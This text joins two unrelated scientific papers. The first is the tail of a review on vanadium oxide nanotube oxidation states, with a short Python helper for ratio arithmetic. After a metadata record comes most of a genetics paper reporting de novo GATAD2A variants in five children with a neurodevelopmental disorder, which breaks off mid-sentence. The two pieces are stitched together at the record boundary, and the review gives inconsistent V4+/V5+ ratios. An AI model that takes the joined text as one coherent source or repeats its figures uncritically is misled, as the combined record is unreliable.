(thiol:amine) was refluxed with ethanol; Au-NPs were added in acetone under constant stirring; some amount of the intercalated self-assembled DDA was replaced with self-assembled (Au-NPs)-DDT. TEM and electron diffraction were used to determine the two phases on the vanadium oxide nanowalls: one corresponding to the VOx-NTs/thiols and the other to the VOx-NTs/Au-NPs inserted into the interlaminar spaces. FT-IR spectroscopy features a vibration band at 962 cm −1 , suggesting small quantities of V 4+ associated with a V 4+ /V 5+ ratio modification; the replacement involves a decrease in intermolecular forces, mainly hydrogen bonds and ion-dipole interactions; the host lattice V 7 O 16 2− experiences an oxidation process, shrinking the V 4+ /V 5+ ratio. Saleta et al. [79] studied the Ni 2+ influence on multiwall VOx-NTs; the self-assembled intercalated 1-hexadecylamine is exchanged with Ni 2+ cations in ethanol/water solvents without altering the tubular morphology; the magnetization characterizations exhibit a major decrease in V 4+ content from ~50.0% to 16.0% (weighted oxidation state from V 4.5+ to V 4.88+ ); the effect was related to the disintercalated 1-hexadecylamine being replaced by Ni 2+ inside the V 7 O 16 2− tubular layers, decreasing the interlayer distances and intermolecular forces. The next reaction exhibits the interexchange reaction. VOx-NTs (46.9% V 4+ and 53.1% V 5+ content) feature an average oxidation state of V 4.531+ ; a set of reactions exhibits these processes, assuming the first step is a simple interexchange reaction and the second step is associated with a redox process. Saliman et al. [81] obtained Zr-doped VOx-NTs, employing the V 2 O 5 precursor with 1-dodecylamine (C 12 H 25 NH 2 ) and adding a slight amount of ZrO 2 ; all the reagents were mixed in water until a gel was formed. The (C 12 H 25 NH 3 ) 2 V 6.86 Zr 0.02 O 16 nanotubes containing 2.0% Zr 4+ dopant were obtained under hydrothermal treatment over four days at 180 °C.
The interlayer distances shifted from 2.65 nm to 2.70 nm; the increase corresponds to the replacement of V 5+ with Zr 4+ , which features a larger ionic radius (0.80 Å) than V 5+ (0.50 Å); therefore, the V 5+ content decreased and the V 4+ /V 5+ ratio should have increased as well; the tubular morphology remained intact, without collapse of the structure.
Charge doping with electrons and holes has also been successfully performed by Krusin-Elbaum et al. [82]. The electron functionalization was performed on (C 12 H 25 NH 3 ) 2 V 7 O 16 nanotubes; the butyllithium solution employed contains the amount of lithium necessary to reduce each V 5+ cation to V 4+ ; the V 4+ /V 5+ ratio increases considerably and ferromagnetic behavior is observed at room temperature. A simple reaction can exemplify the process, assuming some intercalated water remains within the VOx-NTs.
The same method was also applied with the lithium ions intercalated through an interexchange reaction with the self-assembled long alkyl chain primary monoamines; the intercalated lithium ions stabilize the V 4+ /V 5+ ratio, decreasing the V 4+ content, and high-temperature ferromagnetism arises from the Li-VOx-NTs with specific amounts of intercalated lithium ions [83]. The other charge-doping functionalization performed by Krusin-Elbaum was hole doping, employing certain amounts of sublimated iodine for different periods of time to extract electrons from the V 4+ (V(3)) centers; the production of holes eradicates the spin frustration of the VOx-NTs system; the V 4+ /V 5+ ratio decreases and room-temperature ferromagnetism arises, as well. A simple reaction can explain the redox process, assuming there is some intercalated water inside the VOx-NTs.
Saleta et al. [84] conducted research on VOx-NTs aging; it was found that the vanadyl bond V 4+ = O oxidizes to V 5+ = O, drastically changing the V 4+ /V 5+ ratio, so the magnetic properties undergo marked changes. The variation throughout the aging time suggests that oxidation might be the key factor behind the different V 4+ content values reported in the literature, which were obtained employing different quantification methods. The aging process, studied over 65 months at ambient conditions (room temperature and pressure), exhibits oxidation from 70.0% to 12.0% V 4+ content as measured by the XANES technique; the oxidation changes the V 4+ /V 5+ ratio from 2.33 to 0.136; therefore, the weighted oxidation state is V 4.30+ in brand-new and V 4.88+ in aged VOx-NTs. Even though the 58.0% increase in oxidation is drastic, the tubular morphology remains intact; the reaction can be seen below.
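Since the interconversions between V 4+ content, the V 4+ /V 5+ ratio, and the weighted oxidation state recur throughout this section, the short sketch below (ours, not taken from the cited works; the function names are arbitrary) makes the arithmetic explicit and reproduces the aging-study figures quoted above.

```python
# Bookkeeping helpers for a V4+/V5+ mixture (illustrative sketch).

def weighted_oxidation_state(frac_v4: float) -> float:
    """Average vanadium oxidation state given the V4+ fraction (0..1)."""
    # 4 * f + 5 * (1 - f) simplifies to 5 - f
    return 5.0 - frac_v4

def v4_v5_ratio(frac_v4: float) -> float:
    """V4+/V5+ molar ratio from the V4+ fraction."""
    return frac_v4 / (1.0 - frac_v4)

# Values quoted for the 65-month aging study of VOx-NTs:
for label, f in [("brand-new", 0.70), ("aged", 0.12)]:
    print(f"{label}: ratio = {v4_v5_ratio(f):.3f}, "
          f"state = V{weighted_oxidation_state(f):.2f}+")
# brand-new: ratio = 2.333, state = V4.30+
# aged:      ratio = 0.136, state = V4.88+
```

The same helpers reproduce the other values quoted in this review, for example a 1/3 ratio giving V 4.75+ and a 1/2 ratio giving approximately V 4.67+ for the defect-rich and regular nanotubes discussed next.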
Morphologic Defects
Structural morphologic defects might be involved in some redox processes of vanadium oxide microstructures. The reduction could increase or decrease, depending on the type of defect. For example, defect-rich VOx-NTs [69] have smaller amounts of V 4+ content than regular VOx-NTs, and the different magnetic properties are related to these defects. The effect is accomplished when the amount of surfactant (reducing agent) is decreased; the molar stoichiometry used to achieve the effect is 2:1 (V 2 O 5 :C 18 H 37 NH 2 (1-octadecylamine)). Defect-rich (C 18 H 37 NH 3 ) 2 V 7 O 16 VOx-NTs exhibit a 1/3 V 4+ /V 5+ ratio, resulting in a V 4.75+ weighted oxidation state (25.0% V 4+ and 75.0% V 5+ content, respectively), in comparison with conventional (C 18 H 37 NH 3 ) 2 V 7 O 16 VOx-NTs with a 1/2 V 4+ /V 5+ ratio, which corresponds to 33.45% V 4+ and 66.55% V 5+ content and a weighted oxidation state of V 4.666+ . The defects are oxygen vacancies; the formation of O-V 5+ -OH hydroxyl groups with 60.0% content causes the V(3) tetrahedral V 4+ site to undergo oxidation in the V 7 O 16 2− structural lattice. The vanadyl bond, V 4+ = O, transitions to V 5+ -OH in the defect-rich VOx-NTs, in comparison with the 30.0% hydroxyl groups exhibited in the regular 1/2 V 4+ /V 5+ ratio VOx-NTs sample. The reaction below explains the possible oxidation. The set of micrographs in Figure 10 exhibits some structural morphologic defects: in (NH 4 ) 2 V 7 O 16 MSQ, the eroded borders display a high degree of porosity, and (C 18 H 35 NH 3 ) 2 V 7 O 16 NU displays a surface crack obtained through the hydrothermal treatment, which might also change the V 4+ /V 5+ ratio. Other SEM and TEM micrographs of defective VOx microstructures are featured in the supporting information, Figures S5 and S6.
Conclusions
Vanadium oxide microstructures with mixed oxidation states are frequently obtained under sol-gel processes enhanced with hydrothermal treatment. Intercalation processes using functional groups such as long alkyl chain primary monoamines or ammonium cations regulate the vanadium oxidation states in different proportions. For urchins and nanotubes containing self-assembled long alkyl chain primary amines, the V 4+ /V 5+ ratio is around 0.85 (46.0% V 4+ and 54.0% V 5+ ); for a layered square morphology intercalated with ammonium cations, the V 4+ /V 5+ ratio is around 2.70 (73.0% V 4+ and 27.0% V 5+ ); in other vanadium oxide microstructures where no intercalation compounds are obtained during hydrothermal treatment, such as rotationally symmetric six-folds and hexangular star-fruits, the reductions go even further; in the case of six-folds, a mixed V 3+ /V 4+ oxidation state is generated, and, for star-fruits and micrometric crosses, a sole V 4+ oxidation state develops.
Intermolecular forces, such as dipole-dipole and ion-dipole interactions, are fundamental to the intercalation processes and perhaps control the oxidation state ratio; nevertheless, stronger intermolecular forces such as hydrogen bonds play a major role for urchins, squares, and nanotubes, where multiple interactions occur inside the vanadium oxide layers during the sol-gel process. The V 5+ oxidation state remains constant throughout the hydrothermal treatment; the London forces between the self-assembled long alkyl chains, together with the ion-dipole and cooperative hydrogen bond interactions between the primary monoamine functional groups and the vanadyl bonds of the host V 7 O 16 2− structural lattice, are enough to maintain the V 4+ /V 5+ ratio at 1.0 in the nanotubes and urchins. In the square morphology, cooperative hydrogen bonds between the ammonium cation and the vanadyl bonds from the V 7 O 16 2− host lattice increase the V 4+ /V 5+ ratio to 2.70. An analogous effect arises with intercalated protonated ethylenediamines, which display the same behavior with the vanadyl bonds from the V 7 O 16 2− host lattice if the synthesis is performed at a pH lower than 6. All three vanadium oxide microstructures will produce mixed oxidation states.
If the intercalation processes do not prevail during the hydrothermal treatment, or were not developed during the first stage of the synthesis, the reduction processes are straightforward, depending on factors such as the functional group of the surfactant, the vanadium oxide (V 2 O 5 ) precursor concentration, and the temperature and reaction time used previously in the sol-gel process. During the hydrothermal treatment, a complete reduction from V 5+ to V 4+ emerges in structures such as hexangular star-fruits and vanadium oxide crosses (VO 2 or V 2 O 4 ). The reduction degree is even higher in rotationally symmetric six-folds (V 6 O 11 ), which exhibit a V 3+ /V 4+ ratio.
Vanadium oxide chemistry exhibits multivariant equilibria involving most types of ionic equilibria, such as acid-base, coordination, solubility, and redox, associated with different structural lattices.
Author Contributions: Conceptualization, methodology, resources, writing-original draft preparation, writing-review and editing, visualization, supervision, funding acquisition, D.N. All authors have read and agreed to the published version of the manuscript. | 2022-12-31T16:13:17.222Z | 2022-12-28T00:00:00.000 | {
"year": 2022,
"sha1": "5fea306e1b7ce37c2b05ae7a6d9540ca56713031",
"oa_license": "CCBY",
"oa_url": "https://www.mdpi.com/2624-781X/4/1/1/pdf?version=1672227417",
"oa_status": "GOLD",
"pdf_src": "MergedPDFExtraction",
"pdf_hash": "2030e6f0dccc821fc415940c388fbcc8d8a796e1",
"s2fieldsofstudy": [
"Chemistry"
],
"extfieldsofstudy": []
} |
258274376 | pes2o/s2orc | v3-fos-license | De novo variants in GATAD2A in individuals with a neurodevelopmental disorder: GATAD2A-related neurodevelopmental disorder
Summary GATA zinc finger domain containing 2A (GATAD2A) is a subunit of the nucleosome remodeling and deacetylase (NuRD) complex. NuRD is known to regulate gene expression during neural development and other processes. The NuRD complex modulates chromatin status through histone deacetylation and ATP-dependent chromatin remodeling activities. Several neurodevelopmental disorders (NDDs) have been previously linked to variants in other components of NuRD’s chromatin remodeling subcomplex (NuRDopathies). We identified five individuals with features of an NDD that possessed de novo autosomal dominant variants in GATAD2A. Core features in affected individuals include global developmental delay, structural brain defects, and craniofacial dysmorphology. These GATAD2A variants are predicted to affect protein dosage and/or interactions with other NuRD chromatin remodeling subunits. We provide evidence that a GATAD2A missense variant disrupts interactions of GATAD2A with CHD3, CHD4, and CHD5. Our findings expand the list of NuRDopathies and provide evidence that GATAD2A variants are the genetic basis of a previously uncharacterized developmental disorder.
Introduction
Chromatin modifiers and remodelers have been recently implicated in a variety of neurodevelopmental disorders (NDDs). [1][2][3][4][5][6][7][8] The nucleosome remodeling and deacetylase (NuRD) complex has been linked to four NDDs with overlapping phenotypes as a result of dominant variants in several paralogous subunits of the complex (NuRDopathies). [5][6][7][8][9] NuRD regulates a variety of cellular processes including cell-cycle progression, genome integrity, and cellular differentiation. [10][11][12] The NuRD complex consists of several different subunits, each with a set of paralogous proteins. 9 The holoenzyme complex can be divided into two subcomplexes: the chromatin remodeling subcomplex (CRS) and a histone deacetylation (HDAC) subcomplex, or HDAC core (Figure 1A). The HDAC core consists of three subunits in multiple copies comprised of different paralogs: four retinoblastoma-binding protein (RBBP4/7) subunits, two metastasis-associated protein (MTA1/2/3) subunits, and two histone deacetylase (HDAC1/2) subunits. 10,12 By contrast, the CRS is composed of three monomeric paralogous subunits in series: a methyl-binding domain protein (MBD2/3), a GATAD2 protein (GATAD2A/B, previously known as p66a/b), and a chromodomain helicase DNA-binding protein (CHD3/4/5). A CDK2AP1 protein serves as the final member of the CRS and interacts with GATAD2 and CHD paralogs (not shown in diagram). 10,12 Notably, the various paralogs enable a wide variety of NuRD subtypes, each with the potential to provide unique functions. For example, CHD3-, CHD4-, and CHD5-possessing NuRD subtypes (CHD3-NuRD, CHD4-NuRD, etc.) are differentially expressed during corticogenesis. CHD4-NuRD subtypes activate expression of a specific set of genes in neural progenitor cells, which are subsequently repressed in cortical neurons by CHD3-NuRD. 13,14 Interestingly, CHD3, CHD4, and CHD5 are all associated with dominant NDDs with overlapping phenotypes (CHD3-related syndrome [CHD3RS, also known as Snijders-Blok-Campeau syndrome], CHD4-related syndrome [CHD4RS], and CHD5-related syndrome [CHD5RS]; Figure 1A). [6][7][8][15] Of note, dominant variants in GATAD2B, which tethers the CHD paralogs to the rest of the complex in GATAD2B-NuRD (2B-NuRD) subtypes, have been associated with GATAD2B-associated neurodevelopmental disorder (GAND) (MIM: 615074), a NuRDopathy whose phenotypes encompass nearly all features of CHD3RS, CHD4RS, and CHD5RS combined (Figure 1A). 16 To date, GATAD2A has not been associated with a NuRD-related NDD; however, GATAD2A deficiency has been linked to increased expression of fetal hemoglobin with a nonsense GATAD2A variant (c.19C>T, p.R7*), 17,18 and regulatory variants in GATAD2A are significantly associated with schizophrenia and bipolar disorder. 19,20 The degree to which GATAD2A-NuRD (2A-NuRD) and 2B-NuRD subtypes functionally overlap or diverge is unclear, although some research has suggested non-redundant functions in certain cell types. 10,17,21,22 GATAD2A possesses proline-rich PPPL4 motifs (absent in GATAD2B) that allow for interaction with MYND domains in proteins like ZMYND8. 21 GATAD2A also seems to have a non-redundant role in early stem cell differentiation, and its ablation enhances pluripotent reprogramming. 22 Interestingly, GATAD2A is highly expressed during early neural development, 23 which is consistent with early embryonic lethality and variable developmental defects in Gatad2a knockout mice. 24 We report the identification of five novel de novo heterozygous variants in GATAD2A in five unrelated individuals with NDD phenotypes.
Despite variable expressivity of phenotypes, shared clinical features in affected individuals include global developmental delay (GDD), structural brain defects, and craniofacial anomalies. Observed clinical phenotypes overlap with other NuRDopathies, suggesting that NuRD paralog deficiencies may converge on similar mechanisms during development. We also demonstrate that one missense variant (c.1259 G>A, p.C420Y) disrupts known interactions between GATAD2A and CHD paralogs. We hypothesize that these GATAD2A variants likely act through a loss-of-function (LoF) haploinsufficiency mechanism. Together, we provide evidence for a GATAD2A-related neurodevelopmental disorder that we have termed GARND ( Figure 1A).
Research subjects
All subjects and parents or guardians provided informed consent and were enrolled in institutional review board (IRB)-approved research studies. Consenting was performed in accordance with the ethical standards of the respective IRB committees on human research subjects and in keeping with international standards. Probands (P) 2-5 were identified through multiple nodes in the MatchMaker Exchange, including GeneMatcher and MyGene2. 25,26 Participants were recruited at the respective contributing institutions.
Variant calling and annotation
Variant calling of single-nucleotide variants (SNVs) and copy number variants was performed using GATK and CONIFER, respectively. The data were filtered and annotated using GEMINI v.0.19.1 and the Variant Effect Predictor (VEP). Variants were also filtered against public databases including the 1000 Genomes Project phase 3, the Genome Aggregation Database (gnomAD), and the NHLBI Exome Sequencing Project (ESP) 6500. Those with a minor allele frequency >0.005 were excluded. In addition, variants flagged as low impact, low quality, or putative false positives (Phred quality score <20) were excluded from the analysis. Variants in genes known to be associated with NDD were selected and prioritized based on predicted pathogenicity.
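Purely as an illustration, the filtering criteria above can be condensed into a few lines of Python; the actual analysis used GEMINI/VEP queries, and the record fields used here (max_maf, impact, qual) are placeholder names rather than GEMINI's real schema.

```python
# Placeholder re-implementation of the filtering rules described above.
MAX_MAF = 0.005   # exclude variants with minor allele frequency > 0.005
MIN_QUAL = 20     # exclude putative false positives (Phred quality < 20)

annotated_variants = [  # toy records, not real study data
    {"gene": "GATAD2A", "max_maf": 0.0,  "impact": "HIGH",     "qual": 99},
    {"gene": "EXAMPLE", "max_maf": 0.02, "impact": "MODERATE", "qual": 60},
]

def passes_filters(v: dict) -> bool:
    """Keep rare, non-low-impact, confidently called variants."""
    if v["max_maf"] > MAX_MAF:   # highest MAF across 1000G / gnomAD / ESP6500
        return False
    if v["impact"] == "LOW":     # low-impact annotations are dropped
        return False
    if v["qual"] < MIN_QUAL:
        return False
    return True

candidates = [v for v in annotated_variants if passes_filters(v)]
print([v["gene"] for v in candidates])  # ['GATAD2A']
```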
The de novo status of GATAD2A variants in P1, P3, and P5 was reported based on trio exome sequencing results, and by Sanger sequencing confirmation in participants P2 and P3 and their respective parents (Figure 1B). Pathogenicity of variants was assessed according to American College of Medical Genetics (ACMG) guidelines and using the Franklin by Genoox online classification tool. All variants were submitted to ClinVar (accession nos. VCV001705818.2, VCV001705819.2, VCV001705820.2, VCV001705821.2, and VCV001705822.2).
Protein conservation, structure, and in silico analyses
The NCBI HomoloGene tool was used to obtain aligned amino acid sequences of GATAD2A across species at affected residues and flanking regions. Protein alignment was performed on GATAD2A and GATAD2B sequences using Geneious Prime v.2022.1.1 global alignment with free end gaps and a BLOSUM62 cost matrix. PDB files for GATAD2A (AF-Q86YP4) were downloaded and extracted from the AlphaFold Protein Structure Database's reference Homo sapiens proteome file no. UP000005640. The structure was edited in PyMOL v.2.5.2. In silico prediction of the functional impact of GATAD2A variants was performed using Polymorphism Phenotyping (PolyPhen-2) v.2.2.3r406 with the HumDiv model, Sorting Intolerant From Tolerant (SIFT), varSEAK, and MutationTaster2021. [27][28][29] Combined annotation-dependent depletion (CADD) Phred scores were obtained for each variant using the CADD web server.
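For readers without a Geneious license, a roughly equivalent pairwise alignment can be scripted with Biopython (version 1.80 or later assumed); the gap penalties and the short toy fragments below are illustrative choices, not the parameters or sequences from the study, and identity values depend on how gapped columns are counted, so they will differ slightly from Geneious output.

```python
# Approximate Biopython analogue of the Geneious settings described above:
# global alignment, free end gaps, BLOSUM62 substitution matrix.
from Bio import Align
from Bio.Align import substitution_matrices

aligner = Align.PairwiseAligner()
aligner.mode = "global"
aligner.substitution_matrix = substitution_matrices.load("BLOSUM62")
aligner.open_gap_score = -11   # illustrative penalty
aligner.extend_gap_score = -1  # illustrative penalty
aligner.end_gap_score = 0      # "free end gaps"

seq_a = "MSTGRRAELLAQKQ"  # placeholder fragment standing in for GATAD2A
seq_b = "MSAGRKAELLQ"     # placeholder fragment standing in for GATAD2B
aln = aligner.align(seq_a, seq_b)[0]

row_a, row_b = aln[0], aln[1]  # gapped rows of the best alignment
# In a pairwise alignment no column is gap/gap, so a == b implies a match.
matches = sum(a == b for a, b in zip(row_a, row_b))
identity = 100.0 * matches / len(row_a)
print(f"{identity:.3f}% identity over {len(row_a)} alignment columns")
```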
Western blotting and co-immunoprecipitation
Immunoprecipitation assays were performed as previously described. 16 In brief, HA-GATAD2A WT and HA-GATAD2A C420Y proteins were independently co-expressed with each of the three FLAG-CHD-CTD fusion proteins in rabbit reticulocyte lysates for in vitro translation (IVT). Expressed FLAG-CHD-CTD proteins together with HA-GATAD2A proteins were immobilized on anti-FLAG resin, washed, and eluted with 3X-FLAG peptide. In parallel, IVT lysates expressing only an HA-GATAD2A or FLAG-CHD-CTD protein, as well as lysates with no expressed protein, were run as negative controls. Immunoprecipitation inputs and eluates were loaded and run with sodium dodecyl sulfate-polyacrylamide gel electrophoresis followed by transfer to a polyvinylidene fluoride membrane. Immunoblots were probed with anti-HA-HRP (1:20,000, Cell Signaling Technology, no.2999S) followed by probing with anti-FLAG-HRP (1:80,000, Sigma Aldrich, no. A8592).
Results
Individuals with heterozygous GATAD2A variants exhibit features of developmental disorders
Through research exome sequencing, we identified a de novo variant of uncertain significance in the GATAD2A gene (NM_017660.5) in a child (P1; c.673C>T, p.R225*) who presented with multiple congenital anomalies at age 1 month (Figures 1B-1D). He was diagnosed with imperforate anus, moderate membranous ventricular septal defect, patent ductus arteriosus, right optic nerve coloboma, microphthalmia, and bilateral hydronephrosis. Craniofacial dysmorphisms include choanal atresia, prominent or broad forehead, deep-set eyes, and broad nasal root (Figure 1C). He had GDD, with a brain MRI at 4 days old that showed pyriform aperture stenosis, small optic nerves, bilateral cerebellar hematomas, parietooccipital hematoma, enlarged ventricles, and a thin corpus callosum (Figure 1D).
Normal testing results from chromosomal microarray and a CHARGE syndrome sequencing panel necessitated exome sequencing. A de novo nonsense GATAD2A variant (c.673C>T, p.R225*) was identified by trio exome sequencing that is absent in control populations (gnomAD v.2.1.1), with in silico analysis supporting a deleterious effect (Table 1). After identifying individual P1, we subsequently identified four additional unrelated individuals with novel de novo variants in GATAD2A through international variant-sharing efforts and have summarized their phenotypes below as well as in Table 1 (Figure 1B).
Individual P2 was a 7-year-old male who presented with mild short stature, chronic otitis media and associated hearing loss, hypotonia, and borderline macrocephaly. He had feeding difficulties, mild GDD, and speech delay although he continued to make developmental progress. Echocardiogram identified mild atrial enlargement. Head ultrasound revealed mildly asymmetric ventricles. Craniofacial features include prominent forehead, deep-set eyes, midface hypoplasia, and a broad nasal root ( Figure 1C). Exome sequencing identified a de novo heterozygous missense GATAD2A variant (c.1259G>A, p.C420Y) in P2, with inheritance confirmed by subsequent trio Sanger sequencing.
Individual P3 was an 8-year-old female who presented with mild hemihyperplasia, horseshoe kidney, and bilateral Wilms tumor. She had normal development, and neuroimaging was not performed. Craniofacial dysmorphisms included hypertelorism, prognathism, and broad nasal tip. Trio exome sequencing identified a de novo heterozygous frameshift GATAD2A variant (c.1877delT, p.I627Tfs) in P3, which was confirmed by Sanger sequencing.
Individual P4 was a 4-year-old female who presented with right-sided hemihyperplasia. She had GDD, speech delay, and autistic features. Neuroimaging was not performed. No craniofacial dysmorphisms were noted. Exome sequencing identified a heterozygous GATAD2A missense variant (c.1205G>T, p.G402V) in P4 of unknown inheritance.
Individual P5 was a 4-year-old male who presented with GDD. No structural brain anomalies were observed by brain MRI and no craniofacial dysmorphisms were noted. Trio exome sequencing identified a de novo heterozygous GATAD2A missense variant (c.626C>T, p.T209I) in P5.
In summary, the shared clinical features with variable expressivity include GDD, hemihyperplasia, craniofacial dysmorphism, and structural brain defects (Table 1). Nearly all (4/5) individuals in our cohort presented with developmental and growth defects. Three of the five individuals exhibited craniofacial dysmorphology. Musculoskeletal anomalies were also observed in three of the five individuals. Although unlikely, variants of uncertain significance (VUSs) were identified in other genes in P1 and P2 that may also be contributing to the observed clinical phenotypes (Table 1). 32,33
GATAD2A heterozygous variants predicted to disrupt NuRD interactions correlate with neurodevelopmental features
Both GATAD2 proteins possess two highly conserved domains: conserved region 1 (CR1) and conserved region 2 (CR2). 34 CR1 is more N-terminal and encodes a coiled-coil domain that interacts with a similar domain in MBD proteins for coiled-coil binding; by contrast, CR2 is downstream and possesses GATA-type zinc finger domains shown to interact with CHD paralogs (Figure 2A). 5,16 CR1 is thought to tether the MBD-HDAC core unit to GATAD2 proteins, whereas CR2 tethers GATAD2 proteins to the CHD paralogs. CDK2AP1 has also been shown to interact with CR2. 35 Pairwise alignment indicates that GATAD2A has protein sequence homology (40.841%) with its paralog GATAD2B, predominantly around the CR1 and CR2 domains. Of note, in GATAD2B, LoF variants were identified across most of the coding sequence, while missense variants only localized to the CR1 and CR2 domains. 5,16,36 Among the identified GATAD2A variants in our cohort, three were missense (c.1205G>T, p.G402V; c.1259G>A, p.C420Y; c.626C>T, p.T209I), one was nonsense (c.673C>T, p.R225*), and one was frameshift (c.1877delT, p.I627Tfs) at the extreme C terminus (Figure 2A). Following ACMG standards and guidelines, one of the five GATAD2A variants was classified as likely pathogenic (p.I627Tfs), whereas the other four were VUSs (p.T209I, p.R225*, p.G402V, p.C420Y) (Table 1). 37 All discovered variants were absent in public databases (gnomAD v.2.1.1), where GATAD2A demonstrated both a high probability of LoF intolerance (pLI) (observed/expected SNVs [o/e] = 0.06; pLI = 1) and high intolerance to missense variation (o/e = 0.83; Z = 1.27). In light of the difficulty of interpreting variants of uncertain significance, we used the MetaDome web server, which pools data from gnomAD and the Human Gene Mutation Database to provide intolerance profiles for missense variants at amino acid-level resolution. 31 From this analysis, there is uneven intolerance across GATAD2A, with notable and predictable hotspots of intolerance concentrated around the CR1 and CR2 regions (Figure 2B). Importantly, missense variants identified in our cohort lie at predicted intolerant residues in MetaDome. All GATAD2A variants affect conserved residues localized throughout GATAD2A (Figure 2C). Except for p.T209I, all variants have CADD scores above 20 (Table 1). Missense variants p.G402V and p.C420Y are predicted to be possibly or probably damaging by PolyPhen-2, and deleterious by SIFT (Table 1). These missense variants affect homologous residues that are conserved in GATAD2B (Figure 2C). Notably, the p.G402V
missense variant affects a residue homologous to the GATAD2B p.G406 residue, where a pathogenic variant was previously identified in GAND, 16 as well as in two previously unreported individuals with GAND (variants p.G406S and p.G406C, data not shown) (Figure 2C). These findings in several individuals with GAND indicate that the GATAD2B p.G406 residue has functional importance, and the homologous residue p.G402 in GATAD2A is likely to have a similar effect. Previous studies have shown that GATAD2B p.G406R does not disrupt GATAD2B interactions with CHD proteins, suggesting that its pathogenicity may be associated with disruption of other protein interaction(s). Alternatively, both the GATAD2A (c.1205G>T, p.G402V) and GATAD2B (c.1216G>C, p.G406R) changes lie at exon-intron boundaries, with the GATAD2A variant predicted to have a LoF effect on the 3′ splice site of intron 8, which may result in use of a cryptic splice site three nucleotides upstream (varSEAK, class 4). GATAD2B variants also provide additional evidence for the pathogenicity of the GATAD2A p.C420Y variant. Missense variants in GATAD2B affecting homologous zinc-binding cysteines were present in multiple individuals with GAND and are expected to have the same effect on GATAD2A. 16 Finally, our GATAD2 paralog protein alignment revealed that the p.I627Tfs variant lies within a C-terminal motif that is highly conserved across species as well as with GATAD2B, with the residues flanking the motif being widely divergent between the two paralogs (Figure 2C). Conversely, the p.R225* nonsense and the p.T209I missense variants lie near PPPL4 motifs that are absent in GATAD2B (Figure 2C). Together, these computational and population genetics analyses provide additional evidence for the negative functional consequences of these GATAD2A heterozygous variants. Of note, variants that might alter protein dosage (p.R225* and p.G402V) and/or the structure of the CR2 domain (p.G402V and p.C420Y), resulting in functional haploinsufficiency, are present among individuals with neurodevelopmental defects. Among these, P1 and P2 (p.R225* and p.C420Y, respectively) present with structural brain defects including enlarged or asymmetric ventricles, thin corpus callosum, and macrocephaly. This evidence suggests that disruption and/or decreased dosage of the GATAD2A-CHD paralog interactions may be important for neural development.
GATAD2A interaction with NuRD components is disrupted by missense variant p.C420Y
Previous work has shown that the CTD of NuRD complex members CHD3, CHD4, or CHD5 is sufficient for GATAD2 protein interactions (Figure 3A). 5,16 The GATAD2 proteins possess GATA-type zinc finger domains within CR2 that are required for this interaction. 16 Given that the GATAD2A p.C420 residue is one of four cysteines that coordinate the zinc ion, we hypothesized that the p.C420Y missense variant may disrupt CR2 zinc finger folding and its subsequent interaction with CHD paralogs. This was previously seen for GATAD2B CR2 zinc-binding cysteine residue variants (p.C420R and p.C420S), which resulted in a GAND diagnosis (Figure 3B). 5,16 To investigate the impact of the p.C420Y missense variant on interactions with CHD3, CHD4, and CHD5, we performed IVT in rabbit reticulocyte lysates to co-express the GATAD2A C420Y protein with each CHD-CTD FLAG-tagged fusion protein. Immunoprecipitation was performed using the FLAG-tagged CHD-CTD fusion proteins as bait followed by pull-down with an anti-FLAG antibody. Compared with GATAD2A WT protein, there was a marked reduction in GATAD2A C420Y binding to all three CHD paralogs (Figure 3C). These findings provide evidence that the p.C420Y missense variant perturbs interactions within the CRS of the NuRD complex.
Discussion
We report de novo heterozygous dominant variants in GATAD2A as a genetic basis of a developmental disorder that we abbreviate as GATAD2A-related neurodevelopmental disorder (GARND). Five distinct GATAD2A variants were identified in five unrelated individuals whose prior genetic testing did not reveal other pathogenic or structural variants in genes that could explain the full array of clinical presentations. Many of the individuals in our cohort presented with overlapping developmental defects. In silico and functional analyses, along with evidence from homologous variants in GATAD2B, support a deleterious effect of the identified GATAD2A nonsense, frameshift, and missense variants. Our immunoprecipitation studies also show a disruption of the interaction between GATAD2A C420Y and the CHD paralogs within the CRS. Further investigation will be required to determine whether this results in a LoF haploinsufficiency mechanism of disease or a dominant-negative disorder due to sequestration of the HDAC-MBD-GATAD2A C420Y partial complex from the CHD paralogs.
Despite some shared clinical features, our clinical findings indicate a range of phenotypic findings in GARND including craniofacial dysmorphisms, musculoskeletal anomalies, cerebral malformations, cardiovascular anomalies, and ophthalmological abnormalities. Little information has been known about GATAD2A variants in disease. One previous report of a nonsense variant in GATAD2A (c.19C>T, p.R7*) linked it to elevated levels of fetal hemoglobin, but made no mention of neurodevelopmental status. 18 The report also identified several predicted benign GATAD2A missense variants with only one present within CR2 (p.N382S). None of these were associated with changes in fetal hemoglobin levels and no neurodevelopmental data was reported. Whether individuals in our cohort have elevated fetal hemoglobin is unknown.
The array of clinical phenotypes in our GARND cohort show moderate overlap with other dominant NuRDopathies (CHD3RS, CHD4RS, CHD5RS, and GAND). [5][6][7][8]16 In all five disorders, GDD, hypotonia, and dysmorphic craniofacial features (broad forehead, hypertelorism, wide nasal bridge) have been noted. For all disorders except CHD5RS, macrocephaly and ventriculomegaly have been observed, although it is more common in GAND than in CHD3RS and CHD4RS. 5 The phenotypes of GARND, GAND, CHD3RS, and CHD5RS all include speech deficits, whereas CHD4RS, GARND, and GAND phenotypes include congenital cardiac defects. GARND, GAND, and CHD3RS also share neonatal feeding difficulties. Unlike GAND's relatively consistent phenotype across affected individuals, the GARND phenotypes reported here were more variable across individuals. Whether this was the result of the cohort's unique variant makeup (and lack of redundancy) or GARND itself needs to be determined. As more cases of GARND are defined, it will be important to evaluate the frequency of divergent phenotypic NuRDopathy features such as macrocephaly, kidney disease, and hearing impairment, and the pattern of shared features between GARND and other NuRDopathies.
Our findings provide evidence in support of a hypothesis wherein pathogenic heterozygous variations in GATAD2A act through a LoF haploinsufficiency mechanism in affected individuals. The variability in clinical phenotypes in our cohort, coupled with the variable predicted intolerance across GATAD2A, may reflect the importance of 2A-NuRD during development and/or a polygenic effect based on genetic background. Furthermore, pleiotropic functions of GATAD2A in tissues may reflect cell-type variation in GATAD2 and NuRD paralog redundancy. Of note, we observed neurodevelopmental features in individuals with GATAD2A variants that could cause haploinsufficiency of CR2 function, which are predicted to disrupt interactions with the CTD region of CHD paralogs. These findings suggest that neural development is particularly susceptible to impairment of the chromatin remodeling activity of 2A-NuRD and 2B-NuRD complexes. Our co-immunoprecipitation findings confirm diminished GATAD2A-CHD interaction in the presence of the CR2-localized p.C420Y missense variant (similar to a number of patient variants in GAND). 5,16 We showed that the GATAD2A p.C420Y variant affects a cysteine within a zinc-binding motif, which is also disrupted by previously reported GATAD2B p.C420 variants in individuals with GAND (Figure 2C). 5,16 We also found that the affected glycine of 